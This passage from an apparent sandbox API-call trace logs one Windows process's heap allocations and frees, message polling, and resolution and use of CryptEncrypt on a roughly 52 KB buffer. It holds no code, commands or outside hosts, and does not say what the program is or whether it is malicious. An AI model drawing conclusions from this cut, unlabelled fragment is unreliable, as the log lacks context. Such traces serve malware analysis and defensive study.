lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.101] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0088.101] CryptEncrypt (in: hKey=0x9a40c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xcdc4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xcdc8) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.102] CharLowerBuffW (in: lpsz="byte[52680]", cchLength=0xb | out: lpsz="byte[52680]") returned 0xb [0088.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.103] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.103] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0088.103] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.103] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.103] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcdc4) returned 0x37cce18 [0088.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9d18 [0088.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.107] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0088.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77fd0 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0088.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0088.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0088.108] CryptEncrypt (in: hKey=0x9a40c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcdc4, dwBufLen=0xcdc8 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xcdc8) returned 1 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a30 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0088.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0088.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0088.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0088.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0088.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0088.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: 